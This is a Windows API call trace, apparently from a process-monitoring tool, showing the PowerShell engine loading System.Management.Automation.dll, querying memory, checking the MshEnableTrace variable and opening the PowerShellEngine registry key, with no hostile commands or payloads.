	[0228.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.216] GetLastError () returned 0xcb
	[0228.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.216] GetLastError () returned 0xcb
	[0228.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.216] GetLastError () returned 0xcb
	[0228.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.216] GetLastError () returned 0xcb
	[0228.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.217] GetLastError () returned 0xcb
	[0228.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.217] GetLastError () returned 0xcb
	[0228.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.217] GetLastError () returned 0xcb
	[0228.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.217] GetLastError () returned 0xcb
	[0228.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.217] GetLastError () returned 0xcb
	[0228.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.217] GetLastError () returned 0xcb
	[0228.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.217] GetLastError () returned 0xcb
	[0228.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.218] GetLastError () returned 0xcb
	[0228.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.232] GetLastError () returned 0xcb
	[0228.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.232] GetLastError () returned 0xcb
	[0228.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.232] GetLastError () returned 0xcb
	[0228.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.233] GetLastError () returned 0xcb
	[0228.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.443] GetLastError () returned 0xcb
	[0228.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.443] GetLastError () returned 0xcb
	[0228.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.443] GetLastError () returned 0xcb
	[0228.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.444] GetLastError () returned 0xcb
	[0228.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.444] GetLastError () returned 0xcb
	[0228.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.444] GetLastError () returned 0xcb
	[0228.444] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0228.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.446] GetLastError () returned 0xcb
	[0228.586] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0228.616] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.617] GetLastError () returned 0xcb
	[0228.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.674] GetLastError () returned 0xcb
	[0228.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.678] GetLastError () returned 0xcb
	[0228.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.687] GetLastError () returned 0xcb
	[0228.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.691] GetLastError () returned 0xcb
	[0228.698] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0228.701] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0228.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.877] GetLastError () returned 0xcb
	[0229.008] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0229.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.018] GetLastError () returned 0xcb
	[0229.414] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x328e38
	[0229.510] GetLastError () returned 0x0
	[0229.511] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x328ec0
	[0229.512] GetLastError () returned 0x0
	[0229.885] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.071] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.072] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.073] VirtualQuery (in: lpAddress=0xac8e4, lpBuffer=0xad8e4, dwLength=0x1c | out: lpBuffer=0xad8e4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.182] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.182] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.182] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.182] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.182] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.182] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.183] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.183] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.183] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.183] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.183] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.183] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.183] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.183] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.183] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.183] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.184] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.184] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.184] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.184] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.184] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.184] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.184] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.184] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.184] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.184] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.184] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.185] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.185] VirtualQuery (in: lpAddress=0xad230, lpBuffer=0xae230, dwLength=0x1c | out: lpBuffer=0xae230*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.196] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.196] GetLastError () returned 0xcb
	[0230.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae02c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.196] GetLastError () returned 0xcb
	[0230.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.196] GetLastError () returned 0xcb
	[0230.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.196] GetLastError () returned 0xcb
	[0230.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.196] GetLastError () returned 0xcb
	[0230.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae02c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.357] GetLastError () returned 0xcb
	[0230.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.357] GetLastError () returned 0xcb
	[0230.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.357] GetLastError () returned 0xcb
	[0230.357] VirtualQuery (in: lpAddress=0xad558, lpBuffer=0xae558, dwLength=0x1c | out: lpBuffer=0xae558*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae02c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.359] GetLastError () returned 0xcb
	[0230.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.359] GetLastError () returned 0xcb
	[0230.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.359] GetLastError () returned 0xcb
	[0230.359] VirtualQuery (in: lpAddress=0xad550, lpBuffer=0xae550, dwLength=0x1c | out: lpBuffer=0xae550*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.359] VirtualQuery (in: lpAddress=0xad204, lpBuffer=0xae204, dwLength=0x1c | out: lpBuffer=0xae204*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.359] VirtualQuery (in: lpAddress=0xad204, lpBuffer=0xae204, dwLength=0x1c | out: lpBuffer=0xae204*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.362] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xaec8c | out: phkResult=0xaec8c*=0x3d8) returned 0x0
